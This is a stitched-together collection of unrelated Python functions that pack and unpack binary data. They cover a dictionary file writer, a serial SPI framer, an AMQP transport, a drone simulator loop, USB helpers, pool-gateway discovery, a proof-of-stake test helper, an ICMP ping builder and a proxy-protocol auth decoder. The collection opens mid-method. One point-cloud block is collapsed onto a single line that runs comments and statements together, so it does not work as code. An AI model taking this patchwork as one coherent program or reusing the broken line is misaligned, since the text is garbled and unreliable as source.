    keyblocks_total_size = sum(len(b.get_block()) for b in self._key_blocks)
    if self._version == "2.0":
        preamble = struct.pack(b">QQQQQ",
                               len(self._key_blocks), self._num_entries,
                               self._keyb_index_decomp_size,
                               self._keyb_index_comp_size,
                               keyblocks_total_size)
        # Fix: mask to 32 bits -- on Python 2, zlib.adler32 can return a
        # negative int, which struct.pack(">L") rejects; the mask is a
        # no-op on Python 3.
        preamble_checksum = struct.pack(b">L", zlib.adler32(preamble) & 0xffffffff)
        if(self._encrypt):
            # Checksum covers the plaintext preamble, encryption follows.
            preamble = _salsa_encrypt(preamble, self._encrypt_key)
        outfile.write(preamble)
        outfile.write(preamble_checksum)
    else:
        # Pre-2.0 format: 32-bit fields, no compressed size, no checksum.
        preamble = struct.pack(b">LLLL",
                               len(self._key_blocks), self._num_entries,
                               self._keyb_index_decomp_size,
                               keyblocks_total_size)
        if(self._encrypt):
            preamble = _salsa_encrypt(preamble, self._encrypt_key)
        outfile.write(preamble)
    outfile.write(self._keyb_index)
    for b in self._key_blocks:
        outfile.write(b.get_block())
def save(self, path, items):
    # TODO: purge old cache
    # Generator: stream *items* through unchanged while persisting them
    # to *path* as msgpack-framed (tag, payload) records -- tag 0 for
    # marshal, 1 for cPickle -- then patch the leading count field.
    with atomic_file(path) as f:
        c = 0
        f.write(struct.pack("I", c))  # placeholder count, rewritten at the end
        # check is marshalable and compatible with broadcast
        can_marshal = marshalable(items)
        for v in items:
            if can_marshal:
                try:
                    r = 0, marshal.dumps(v)
                except Exception:
                    # Fall back to pickle permanently after one failure.
                    r = 1, cPickle.dumps(v, -1)
                    can_marshal = False
            else:
                r = 1, cPickle.dumps(v, -1)
            f.write(msgpack.packb(r))
            c += 1
            yield v
        bytes = f.tell()
        if bytes > 10 << 20:
            logger.warning("cached result is %dMB (larger than 10MB)", bytes >> 20)
        # count
        f.seek(0)
        f.write(struct.pack("I", c))
def spi_transfer(data):
    # Frame *data* (truncated to 1024 bytes) into an OPCODE_SPI_TXFR
    # packet -- sync word + (opcode, length, payload) + CRC16 -- exchange
    # it over the global serial port, and return the SPI payload from
    # the reply (or the whole reply if no opcode is found).
    if len(data) > 1024:
        data = data[:1024]
    temp = struct.pack(">BH", OPCODE_SPI_TXFR, len(data)) + data
    crc = crc16_buff(temp)
    tx_data = struct.pack(">H", sync) + temp + struct.pack(">H", crc)
    # print "Data in TX Buffer:" + ':'.join(x.encode('hex') for x in tx_data)
    # Drain anything already sitting in the RX buffer before sending.
    if ser.inWaiting() > 0:
        rx_data = ser.read(ser.inWaiting())
        print "Data in RX Buffer:" + ":".join(x.encode("hex") for x in rx_data)
    ser.write(tx_data)
    time.sleep(1)
    print str(ser.inWaiting()) + " waiting."
    # Reply is assumed to mirror the request framing/length -- confirm.
    rx_data = ser.read(len(tx_data))
    print "SPI RX Data:" + ":".join(x.encode("hex") for x in rx_data)
    print rx_data
    # Verify the CRC over the reply body (between sync word and CRC).
    calc_crc = crc16_buff(rx_data[2:-2])
    if struct.pack(">H", calc_crc) == rx_data[-2:]:
        print "Checksum Match"
    else:
        print "Checksum Fail"
    if ord(rx_data[2]) == OPCODE_SPI_TXFR:
        # Skip sync (2) + opcode (1) + length (2); strip trailing CRC.
        return rx_data[5:-2]
    else:
        print "No Opcode Found!"
        return rx_data
def encode_vector3(value):
    """Pack a 3-component vector (attributes x, y, z) as three
    native-order float32s."""
    return struct.pack("3f", value.x, value.y, value.z)
def read_record(f):
    """Read one Record header plus its payload from binary stream *f*.

    Returns (magic_bytes, size, content): the record's magic number
    re-packed as 4 little-endian bytes, the payload size from the
    header, and the payload itself.
    """
    header = bytearray(f.read(sizeof(Record)))
    record = Record.from_buffer(header)
    payload = f.read(record.size)
    magic_bytes = struct.pack('<I', record.magic)
    return magic_bytes, record.size, payload
def char(c):
    """Pack the one-character string *c* as a single ASCII byte ('=c')."""
    encoded = c.encode('ascii')
    return struct.pack("=c", encoded)
def __init__(self, host, connect_timeout, write_timeout=None, read_timeout=None):
    # Open a TCP connection to an AMQP broker given "host[:port]" (IPv6
    # literals supported via IPV6_LITERAL), configure nodelay/keepalive
    # and optional send/receive timeouts, then send the protocol header.
    self.connected = True
    msg = None
    port = AMQP_PORT
    m = IPV6_LITERAL.match(host)
    if m:
        host = m.group(1)
        if m.group(2):
            port = int(m.group(2))
    else:
        if ':' in host:
            # rsplit so only the final colon is treated as the port separator.
            host, port = host.rsplit(':', 1)
            port = int(port)
    self.sock = None
    last_err = None
    # Try every address getaddrinfo returns until one connects.
    for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM, SOL_TCP):
        af, socktype, proto, canonname, sa = res
        try:
            self.sock = socket.socket(af, socktype, proto)
            try:
                set_cloexec(self.sock, True)
            except NotImplementedError:
                pass
            self.sock.settimeout(connect_timeout)
            self.sock.connect(sa)
        except socket.error as exc:
            msg = exc
            self.sock.close()
            self.sock = None
            last_err = msg
            continue
        break
    if not self.sock:
        # Didn't connect, return the most recent error message
        raise socket.error(last_err)
    try:
        self.sock.settimeout(None)  # set socket back to blocking mode
        self.sock.setsockopt(SOL_TCP, socket.TCP_NODELAY, 1)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
        # set socket timeouts
        # (packed as a struct timeval: seconds, microseconds -- assumes
        #  the intervals are whole seconds; TODO confirm)
        for (timeout, interval) in ((socket.SO_SNDTIMEO, write_timeout),
                                    (socket.SO_RCVTIMEO, read_timeout)):
            if interval is not None:
                self.sock.setsockopt(socket.SOL_SOCKET, timeout,
                                     struct.pack('ll', interval, 0))
        self._setup_transport()
        self._write(AMQP_PROTOCOL_HEADER)
    except (OSError, IOError, socket.error) as exc:
        # Only mark the transport disconnected for non-transient errnos.
        if get_errno(exc) not in _UNAVAIL:
            self.connected = False
        raise
def main_loop(gworld):
    # Generator-based engine tick: mirrors drone poses received over ZMQ
    # into Unreal actors and publishes their camera textures back out.
    # Each `yield` returns control to the host engine for one frame.
    print('-- actors --')
    for p in ph.GetActorsNames(gworld):
        print(p)
    print('-- textures --')
    drone_textures=[]
    for tn in drone_texture_names:
        drone_textures.append(ph.GetTextureByName(tn))
    drone_textures_down=[]
    for tn in drone_textures_down_names:
        drone_textures_down.append(ph.GetTextureByName(tn))
    drone_textures_depth=[]
    for tn in drone_textures_depth_names:
        drone_textures_depth.append(ph.GetTextureByName(tn))
    if not all(drone_textures):
        # Cannot continue without textures; idle forever but keep ticking.
        print("Error, Could not find all textures")
        while 1:
            yield
    drone_actors=[]
    for drn in drone_actors_names:
        drone_actors.append(ph.FindActorByName(gworld,drn))
    if not all(drone_actors):
        print("Error, Could not find all drone actors")
        while 1:
            yield
    for _ in range(10): #need to send it a few time don't know why.
        print('sending state main loop')
        socket_pub.send_multipart([config.topic_unreal_state,b'main_loop'])
        yield
    # Incoming positions are offsets from each drone's spawn location.
    drone_start_positions=[np.array(ph.GetActorLocation(drone_actor)) for drone_actor in drone_actors]
    positions=[None for _ in range(config.n_drones)]
    while 1:
        for drone_index in range(config.n_drones):
            socket_sub=drone_subs[drone_index]
            drone_actor=drone_actors[drone_index]
            # Drain all pending pose messages; only the newest is kept.
            while len(zmq.select([socket_sub],[],[],0)[0])>0:
                topic, msg = socket_sub.recv_multipart()
                positions[drone_index]=pickle.loads(msg)
                #print('-----',positions[drone_index])
            position=positions[drone_index]
            if position is not None:
                new_pos=drone_start_positions[drone_index]+np.array([position['posx'],position['posy'],position['posz']])*100 #turn to cm
                ph.SetActorLocation(drone_actor,new_pos)
                ph.SetActorRotation(drone_actor,(position['roll'],position['pitch'],position['yaw']))
                positions[drone_index]=None
        yield
        for drone_index in range(config.n_drones):
            # Collect the forward RGB texture plus optional downward and
            # depth textures for this drone.
            topics=[]
            imgs=[]
            img=ph.GetTextureData(drone_textures[drone_index])
            topics.append(config.topic_unreal_drone_rgb_camera%drone_index)
            imgs.append(img)
            if drone_index<len(drone_textures_down):
                img_down=ph.GetTextureData(drone_textures_down[drone_index])
                topics.append(config.topic_unreal_drone_rgb_camera%drone_index+b'down')
                imgs.append(img_down)
            if drone_index<len(drone_textures_depth):
                img_depth=ph.GetTextureData16f(drone_textures_depth[drone_index],channels=[0,1,2,3]) #depth data will be in A componnent
                #img_depth=ph.GetTextureData(drone_textures_depth[drone_index],channels=[2]) #depth data will be in red componnent
                topics.append(config.topic_unreal_drone_rgb_camera%drone_index+b'depth')
                imgs.append(img_depth)
            if pub_cv:
                for topic,img in zip(topics,imgs):
                    # Ship a packed shape header plus raw pixels (cheaper
                    # than pickling the array).
                    socket_pub.send_multipart([topic,struct.pack('lll',*img.shape),img.tostring()])
            if show_cv:
                cv2.imshow('drone camera %d'%drone_index,img)
                cv2.waitKey(1)
def bulkRead(self, endpoint, length, timeout=0):
    """Issue a bulk IN transfer request for *length* bytes.

    Fix: the original packed a hard-coded 0 in the length field, so the
    *length* argument was silently ignored; the sibling bulkWrite packs
    the data length in the same field, so pack the requested length here.

    :param endpoint: endpoint number
    :param length: number of bytes requested
    :param timeout: accepted for interface compatibility; unused
    """
    dat = struct.pack("HH", endpoint, length)
    return self.transact(dat)
def bulkWrite(self, endpoint, data, timeout=0):
    """Issue a bulk OUT transfer carrying *data* (at most 0x10 bytes).

    :param endpoint: endpoint number
    :param data: payload bytes
    :param timeout: accepted for interface compatibility; unused
    :raises ValueError: when the payload exceeds 16 bytes
    """
    if len(data) > 0x10:
        raise ValueError("Data must not be longer than 0x10")
    header = struct.pack("HH", endpoint, len(data))
    return self.transact(header + data)
def controlRead(self, request_type, request, value, index, length, timeout=0):
    """Issue a control IN transfer.

    The setup packet is two zero uint16s followed by the standard USB
    fields (bmRequestType, bRequest, wValue, wIndex, wLength).

    :param timeout: accepted for interface compatibility; unused
    """
    setup = struct.pack(
        "HHBBHHH", 0, 0, request_type, request, value, index, length
    )
    return self.transact(setup)
def dd(v):
    """Pack *v* as a 4-byte little-endian unsigned dword."""
    return pack("<I", v)
def discoverGateway(verbose):
    # Broadcast a Pentair discovery datagram on UDP port 1444 and parse
    # the first response into
    # (gatewayIP, gatewayPort, gatewayType, gatewaySubtype, gatewayName, okchk).
    # Exits the process with a distinct status code on each failure mode.
    bcast = "255.255.255.255"
    port = 1444
    wantchk = 2
    addressfamily = socket.AF_INET
    data = struct.pack('<bbbbbbbb', 1,0,0,0, 0,0,0,0)
    # Create a UDP socket
    try:
        udpSock = socket.socket(addressfamily, socket.SOCK_DGRAM)
    except:
        sys.stderr.write("ERROR: {}: socket.socket boarked.\n".format(me))
        sys.exit(1)
    # Get ready to broadcast
    try:
        udpSock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    except:
        sys.stderr.write("ERROR: {}: udpSock.setsockopt boarked.\n".format(me))
        sys.exit(2)
    # send the datagram
    if(verbose):
        print("Broadcasting for pentair systems...")
    try:
        udpSock.sendto(data, (bcast, port))
    except:
        sys.stderr.write("ERROR: {}: udpSock.sendto boarked.\n".format(me))
        sys.exit(3)
    # listen for a gateway responding
    if(verbose):
        print("Waiting for a response...")
    try:
        data, server = udpSock.recvfrom(4096)
    except:
        sys.stderr.write("ERROR: {}: udpSock.recvfrom boarked.\n".format(me))
        sys.exit(4)
    try:
        udpSock.close()
    except:
        # not sure we really need to exit if we can't close the socket...
        sys.stderr.write("ERROR: {}: udpSock.close boarked.\n".format(me))
        sys.exit(5)
    # "server" is ip_address:port that we got a response from.
    # not sure what happens if we have to gateways on a subnet. havoc i suppose.
    if(verbose):
        addr, port = server
        print("INFO: {}: Received a response from {}:{}".format(me(), addr, port))
    # the format here is a little different than the documentation.
    # the response I get back includes the gateway's name in the form of "Pentair: AB-CD-EF"
    expectedfmt = "<I4BH2B"
    # Pad the format with a trailing string field sized to whatever
    # bytes remain (the gateway name).
    paddedfmt = expectedfmt + str(len(data)-struct.calcsize(expectedfmt)) + "s"
    try:
        chk, ip1, ip2, ip3, ip4, gatewayPort, gatewayType, gatewaySubtype, gatewayName = struct.unpack(paddedfmt, data)
    except struct.error as err:
        print("ERROR: {}: received unpackable data from the gateway: \"{}\"".format(me, err))
        sys.exit(6)
    okchk = (chk == wantchk)
    if(not okchk):
        # not sure that I need to exit if "chk" isn't what we wanted.
        sys.stderr.write("ERROR: {}: Incorrect checksum. Wanted '{}', got '{}'\n".format(me, wantchk, chk))
        #sys.exit(7)
    # make sure we got a good IP address
    receivedIP = "{}.{}.{}.{}".format(str(ip1), str(ip2), str(ip3), str(ip4))
    try:
        gatewayIP = str(ipaddress.ip_address(receivedIP))
    except ValueError as err:
        print("ERROR: {}: got an invalid IP address from the gateway:\n \"{}\"".format(me, err))
        sys.exit(8)
    except NameError as err:
        print("ERROR: {}: received garbage from the gateway:\n \"{}\"".format(me, err))
        sys.exit(9)
    except:
        # NOTE(review): *err* is not bound in this bare except clause, so
        # the format call below would itself raise NameError -- confirm.
        print("ERROR: {}: Couldn't get an IP address for the gateway.".format(me, err))
        sys.exit(10)
    if(verbose):
        print("gatewayIP: '{}'".format(gatewayIP))
        print("gatewayPort: '{}'".format(gatewayPort))
        print("gatewayType: '{}'".format(gatewayType))
        print("gatewaySubtype: '{}'".format(gatewaySubtype))
        print("gatewayName: '{}'".format(gatewayName.decode("utf-8").strip('\0')))
    return gatewayIP, gatewayPort, gatewayType, gatewaySubtype, gatewayName.decode("utf-8").strip('\0'), okchk
def db(v):
    """Pack *v* as a single unsigned byte."""
    return pack("<B", v)
def dw(v):
    """Pack *v* as a 2-byte little-endian unsigned word."""
    return pack("<H", v)
def create_unsigned_pos_block(self, staking_prevouts, nTime=None, outNValue=10002, signStakeTx=True, bestBlockHash=None, coinStakePrevout=None):
    # Build a proof-of-stake block on top of bestBlockHash (default: the
    # node's current tip): empty coinbase, solved stake kernel, and a
    # coinstake tx paying 2 * outNValue to a fresh block-signing key.
    # Returns (block, block_sig_key), or None when no kernel is found.
    if not nTime:
        current_time = int(time.time()) + 15
        # Mask to the PoS timestamp granularity (low 4 bits cleared).
        nTime = current_time & 0xfffffff0
    if not bestBlockHash:
        bestBlockHash = self.node.getbestblockhash()
        block_height = self.node.getblockcount()
    else:
        block_height = self.node.getblock(bestBlockHash)['height']
    # Parent block's stake modifier is needed to solve the kernel.
    parent_block_stake_modifier = int(
        self.node.getblock(bestBlockHash)['modifier'], 16)
    parent_block_raw_hex = self.node.getblock(bestBlockHash, False)
    f = io.BytesIO(hex_str_to_bytes(parent_block_raw_hex))
    parent_block = CBlock()
    parent_block.deserialize(f)
    # PoS blocks carry an empty coinbase output.
    coinbase = create_coinbase(block_height + 1)
    coinbase.vout[0].nValue = 0
    coinbase.vout[0].scriptPubKey = b""
    coinbase.rehash()
    block = create_block(int(bestBlockHash, 16), coinbase, nTime)
    block.hashPrevBlock = int(bestBlockHash, 16)
    if not block.solve_stake(parent_block_stake_modifier, staking_prevouts):
        return None
    # create a new private key used for block signing.
    block_sig_key = CECKey()
    block_sig_key.set_secretbytes(hash256(struct.pack('<I', 0xffff)))
    pubkey = block_sig_key.get_pubkey()
    scriptPubKey = CScript([pubkey, OP_CHECKSIG])
    # Coinstake: spends the kernel prevout; first output is the empty
    # coinstake marker, then two equal payouts to the signing key.
    stake_tx_unsigned = CTransaction()
    if not coinStakePrevout:
        coinStakePrevout = block.prevoutStake
    stake_tx_unsigned.vin.append(CTxIn(coinStakePrevout))
    stake_tx_unsigned.vout.append(CTxOut())
    stake_tx_unsigned.vout.append(
        CTxOut(int(outNValue * COIN), scriptPubKey))
    stake_tx_unsigned.vout.append(
        CTxOut(int(outNValue * COIN), scriptPubKey))
    if signStakeTx:
        # Have the node sign the coinstake, then re-deserialize it.
        stake_tx_signed_raw_hex = self.node.signrawtransaction(
            bytes_to_hex_str(stake_tx_unsigned.serialize()))['hex']
        f = io.BytesIO(hex_str_to_bytes(stake_tx_signed_raw_hex))
        stake_tx_signed = CTransaction()
        stake_tx_signed.deserialize(f)
        block.vtx.append(stake_tx_signed)
    else:
        block.vtx.append(stake_tx_unsigned)
    block.hashMerkleRoot = block.calc_merkle_root()
    return (block, block_sig_key)
def dq(v):
    """Pack *v* as a little-endian unsigned 64-bit quadword."""
    fmt = "<Q"
    return pack(fmt, v)
def __init__(self, timeout=3):
    """Record the probe timeout, an 8-byte timestamp payload, and a 16-bit-safe id."""
    self.timeout = timeout
    # the payload carries the send time so the RTT can be recovered from the echo
    self.__data = struct.pack('d', time.time())
    pid = os.getpid()
    # the identifier must fit in an unsigned 16-bit header field
    self.__id = 65534 if pid >= 65535 else pid
def __icmpPacket(self):
    """Build an ICMP echo-request packet (type 8, code 0) with its checksum filled in."""
    # First pass: header with a zeroed checksum field, so the checksum is
    # computed over a well-defined packet.
    draft = struct.pack('bbHHh', 8, 0, 0, self.__id, 0) + self.__data
    checksum = self.__inCksum(draft)
    # Second pass: identical header with the real checksum in place.
    final_header = struct.pack('bbHHh', 8, 0, checksum, self.__id, 0)
    return final_header + self.__data
# color_inds = [[openni2.convert_depth_to_color(depth_stream, color_stream, i, j, depth_img[j, i]) # for i in range(640)] for j in range(480)] # points = np.array(points).reshape(-1, 3)*[1,1,-1] # color_inds = np.clip(np.array(color_inds).reshape(-1, 2), [0, 0], [640 - 1, 480 - 1]) # colors = color_img[color_inds[:, 1], color_inds[:, 0]] points = np.dot(cv2.convertPointsToHomogeneous(points)[:,0], T_mtx_T)[:, :3] pcd = open3d.PointCloud() pcd.points = open3d.Vector3dVector(points) pcd.colors = open3d.Vector3dVector(colors) # open3d.draw_geometries([pcd]) open3d.write_point_cloud(baseReadPath + dataset + "/" + "Kinect2__" + captureFolder + ".ply", pcd) with open(baseReadPath + dataset + "/" + "Kinect2__" + captureFolder + ".bin", "wb") as fp: fp.write(struct.pack("i", len(pcd.points))) for pt in pcd.points: fp.write( struct.pack("i", 3) + struct.pack("d", pt[0]) + struct.pack("d", pt[1]) + struct.pack("d", pt[2])) filterLocs = np.logical_and(np.logical_and(points[:, 2] < 950, points[:, 2] > 200), np.logical_and(np.logical_and(points[:, 0] < 530, points[:, 0] > -60), np.logical_and(points[:, 1] < 160, points[:, 1] > -350))) points = points[filterLocs] colors = colors[filterLocs] pcd = open3d.PointCloud() pcd.points = open3d.Vector3dVector(points) pcd.colors = open3d.Vector3dVector(colors) open3d.write_point_cloud(baseReadPath + dataset + "/" + "filtered__Kinect2__" + captureFolder + ".ply", pcd)
def big_endian(i):
    """Reinterpret *i*'s big-endian 4-byte representation in host byte order.

    On a little-endian host this byte-swaps the signed 32-bit value; on a
    big-endian host it is the identity.
    """
    raw = struct.pack('>i', i)
    return int.from_bytes(raw, byteorder=sys.byteorder)
def encode_color(value):
    """Serialize an RGB(A) sequence as four 32-bit floats; alpha defaults to 1.0."""
    if len(value) == 3:
        r, g, b = value[0], value[1], value[2]
        a = 1.0
    else:
        r, g, b, a = value[0], value[1], value[2], value[3]
    return struct.pack("4f", r, g, b, a)
def encode_quaternion(value):
    """Serialize a quaternion's components as four 32-bit floats in (w, x, y, z) order."""
    components = (value.w, value.x, value.y, value.z)
    return struct.pack("4f", *components)
def word(c):
    """Pack *c* as a native-order signed 16-bit integer."""
    fmt = "=h"
    return struct.pack(fmt, c)
def encode_vector4(value):
    """Serialize the first four components of *value* as 32-bit floats."""
    x, y, z, w = value[0], value[1], value[2], value[3]
    return struct.pack("4f", x, y, z, w)
def _windowResized(self, *args):
    """Handle a local terminal resize by forwarding the new size to the peer."""
    # TIOCGWINSZ fills four unsigned shorts: rows, cols, xpixels, ypixels.
    raw = fcntl.ioctl(0, tty.TIOCGWINSZ, '12345678')
    rows, cols, xpix, ypix = struct.unpack('4H', raw)
    # The window-change request wants (cols, rows, xpix, ypix) as four uint32s.
    self.conn.sendRequest(self, 'window-change', struct.pack('!4L', cols, rows, xpix, ypix))
def encode_int(value):
    """Pack *value* as a native-order C int."""
    encoded = struct.pack("i", value)
    return encoded
# REQUEST must be in format "CC/id/cc/words" or "XY/id/lon/lat/words".
#
import socket
import struct
import sys


def die_usage():
    """Print the usage line and exit with status 1."""
    sys.stdout.write("usage: %s CC/id/cc/words|XY/id/lon/lat/words\n" % sys.argv[0])
    sys.exit(1)


def _recv_exact(sock, count):
    """Read exactly *count* bytes from *sock* (TCP recv may return short reads).

    Returns fewer bytes only if the peer closes the connection early.
    """
    buf = b''
    while len(buf) < count:
        chunk = sock.recv(count - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


if len(sys.argv) != 2:
    die_usage()
arglen = len(sys.argv[1].split('/'))
if (arglen < 4) or (arglen > 5):
    die_usage()

sock = socket.create_connection(('localhost', 8033))
data = sys.argv[1].encode('utf-8')
# Wire format: native uint32 length prefix followed by the UTF-8 request.
sock.sendall(struct.pack('I', len(data)) + data)

lendata = _recv_exact(sock, 4)
if len(lendata) < 4:
    # BUG FIX: the original wrote a bare `exit` (a name reference, not a call —
    # a no-op) and then crashed in struct.unpack on the short buffer.
    sys.exit(1)
length = struct.unpack('I', lendata)[0]
# Read the full reply even if the kernel delivers it in several segments.
print(_recv_exact(sock, length).decode('utf-8'))
def encode_vector2(value):
    """Serialize a 2-D vector's .x/.y attributes as two 32-bit floats."""
    pair = (value.x, value.y)
    return struct.pack("2f", *pair)
def init_from_bin_len(self, bin, length):
    """Seed the v0/v1 state words from raw bytes, splicing *length* into the first two.

    v0 = little-endian u64 of (length as u16) + bytes 2..8; v1 = bytes 8..16.
    """
    # Guarantee at least 16 bytes so the fixed-width slices below never run short.
    if len(bin) < 16:
        bin += b'\0' * 16
    packed_len = struct.pack('<H', length)
    self.v0 = struct.unpack('<Q', packed_len + bin[2:8])[0]
    self.v1 = struct.unpack('<Q', bin[8:16])[0]
def encode_float(value):
    """Pack *value* as a single native-order 32-bit float."""
    encoded = struct.pack("f", value)
    return encoded
def server_post_decrypt(self, buf):
    """Strip the client-side auth/obfuscation layer from incoming data.

    Returns (plaintext, sendback), where sendback requests a reply packet
    even when no payload was decoded. Once authentication fails
    permanently, raw_trans is set and data passes through untouched.
    NOTE(review): this looks like a ShadowsocksR auth-chain style protocol;
    the field layout below is inferred from the unpack offsets — verify
    against the matching client implementation.
    """
    if self.raw_trans:
        return (buf, False)
    self.recv_buf += buf
    out_buf = b''
    sendback = False
    if not self.has_recv_header:
        # --- one-time handshake: 4-byte head, 8-byte HMAC, 20-byte auth block, 4-byte HMAC ---
        if len(self.recv_buf) >= 12 or len(self.recv_buf) in [7, 8]:
            recv_len = min(len(self.recv_buf), 12)
            mac_key = self.server_info.recv_iv + self.server_info.key
            # HMAC over the first 4 bytes must match bytes 4..12
            # (prefix-compared when fewer bytes have arrived so far)
            md5data = hmac.new(mac_key, self.recv_buf[:4], self.hashfunc).digest()
            if md5data[:recv_len - 4] != self.recv_buf[4:recv_len]:
                return self.not_match_return(self.recv_buf)
        if len(self.recv_buf) < 12 + 24:
            # not enough data for the full 36-byte auth header yet
            return (b'', False)
        self.last_client_hash = md5data
        # the user id is XOR-masked with part of the first-stage hash
        uid = struct.unpack('<I', self.recv_buf[12:16])[0] ^ struct.unpack('<I', md5data[8:12])[0]
        self.user_id_num = uid
        uid = struct.pack('<I', uid)
        if uid in self.server_info.users:
            self.user_id = uid
            self.user_key = self.server_info.users[uid]
            self.server_info.update_user_func(uid)
        else:
            # unknown uid: fall back to the shared key when no user table
            # exists, otherwise to the IV (which will fail the check below)
            self.user_id_num = 0
            if not self.server_info.users:
                self.user_key = self.server_info.key
            else:
                self.user_key = self.server_info.recv_iv
        md5data = hmac.new(self.user_key, self.recv_buf[12: 12 + 20], self.hashfunc).digest()
        if md5data[:4] != self.recv_buf[32:36]:
            logging.error('%s data uncorrect auth HMAC-MD5 from %s:%d, data %s' % (
                self.no_compatible_method, self.server_info.client, self.server_info.client_port,
                binascii.hexlify(self.recv_buf)
            ))
            if len(self.recv_buf) < 36:
                return (b'', False)
            return self.not_match_return(self.recv_buf)
        self.last_server_hash = md5data
        # the encrypted 16-byte head rides in bytes 16..32; decrypted with a
        # zero leading block plus one padding byte (see inline comment below)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(self.user_key)) + self.salt, 'aes-128-cbc')
        head = encryptor.decrypt(b'\x00' * 16 + self.recv_buf[16:32] + b'\x00')  # need an extra byte or recv empty
        # head layout (from the offsets): utc_time(4) | client_id(4) | connection_id(4) | overhead(2) | tcp_mss(2)
        self.client_over_head = struct.unpack('<H', head[12:14])[0]
        self.recv_tcp_mss = struct.unpack('<H', head[14:16])[0]
        self.send_tcp_mss = self.recv_tcp_mss
        utc_time = struct.unpack('<I', head[:4])[0]
        client_id = struct.unpack('<I', head[4:8])[0]
        connection_id = struct.unpack('<I', head[8:12])[0]
        time_dif = common.int32(utc_time - (int(time.time()) & 0xffffffff))
        if time_dif < -self.max_time_dif or time_dif > self.max_time_dif:
            # reject stale or future timestamps (replay defence)
            logging.info('%s: wrong timestamp, time_dif %d, data %s' % (
                self.no_compatible_method, time_dif, binascii.hexlify(head)
            ))
            return self.not_match_return(self.recv_buf)
        elif self.server_info.data.insert(self.user_id, client_id, connection_id):
            self.has_recv_header = True
            self.client_id = client_id
            self.connection_id = connection_id
        else:
            logging.info('%s: auth fail, data %s' % (self.no_compatible_method, binascii.hexlify(out_buf)))
            return self.not_match_return(self.recv_buf)
        self.on_recv_auth_data(utc_time)
        # payload-phase stream cipher, keyed from the user key plus the last
        # client hash and seeded with the first 8 bytes of the server hash
        self.encryptor = encrypt.Encryptor(
            to_bytes(base64.b64encode(self.user_key)) + to_bytes(base64.b64encode(self.last_client_hash)),
            'chacha20', self.last_server_hash[:8])
        self.encryptor.encrypt(b'')
        self.encryptor.decrypt(self.last_client_hash[:8])
        self.recv_buf = self.recv_buf[36:]
        self.has_recv_header = True
        sendback = True
    # --- steady state: length-prefixed, HMAC-trailed chunks ---
    while len(self.recv_buf) > 4:
        # per-chunk MAC key mixes in the running receive counter
        mac_key = self.user_key + struct.pack('<I', self.recv_id)
        recv_buf = self.recv_buf
        # the length prefix is XOR-masked with bytes of the previous client hash
        data_len = struct.unpack('<H', recv_buf[:2])[0] ^ struct.unpack('<H', self.last_client_hash[14:16])[0]
        cmd_len = 0
        while data_len >= 0xff00:
            if data_len == 0xff00:
                # 0xff00 is an in-band command prefix (syncs the MSS); skip it
                # and re-read the real length with a different mask
                cmd_len += 2
                self.recv_tcp_mss = self.send_tcp_mss
                recv_buf = recv_buf[2:]
                data_len = struct.unpack('<H', recv_buf[:2])[0] ^ struct.unpack('<H', self.last_client_hash[12:14])[0]
            else:
                self.raw_trans = True
                self.recv_buf = b''
                if self.recv_id == 1:
                    # first chunk already malformed: reply with junk instead of raising
                    logging.info(self.no_compatible_method + ': over size')
                    return (b'E' * 2048, False)
                else:
                    raise Exception('server_post_decrype data error')
        rand_len = self.recv_rnd_data_len(data_len + cmd_len, self.last_client_hash, self.random_client)
        length = data_len + rand_len
        if length >= 4096:
            # chunk claims to be larger than the protocol allows
            self.raw_trans = True
            self.recv_buf = b''
            if self.recv_id == 1:
                logging.info(self.no_compatible_method + ': over size')
                return (b'E' * 2048, False)
            else:
                raise Exception('server_post_decrype data error')
        if length + 4 > len(recv_buf):
            # chunk not fully buffered yet; wait for more data
            break
        client_hash = hmac.new(mac_key, self.recv_buf[:length + cmd_len + 2], self.hashfunc).digest()
        if client_hash[:2] != self.recv_buf[length + cmd_len + 2: length + cmd_len + 4]:
            logging.info('%s: checksum error, data %s' % (
                self.no_compatible_method, binascii.hexlify(self.recv_buf[:length + cmd_len]),
            ))
            self.raw_trans = True
            self.recv_buf = b''
            if self.recv_id == 1:
                return (b'E' * 2048, False)
            else:
                raise Exception('server_post_decrype data uncorrect checksum')
        self.recv_id = (self.recv_id + 1) & 0xFFFFFFFF
        # payload starts after the 2-byte masked length prefix
        pos = 2
        if data_len > 0 and rand_len > 0:
            pos = 2
        out_buf += self.encryptor.decrypt(recv_buf[pos: data_len + pos])
        self.last_client_hash = client_hash
        self.recv_buf = recv_buf[length + 4:]
        if data_len == 0:
            # zero-length chunk acts as a keep-alive / ack request
            sendback = True
    if out_buf:
        self.server_info.data.update(self.user_id, self.client_id, self.connection_id)
    return (out_buf, sendback)
def p(x):
    """Pack *x* as a little-endian unsigned 32-bit integer."""
    encoded = struct.pack('<I', x)
    return encoded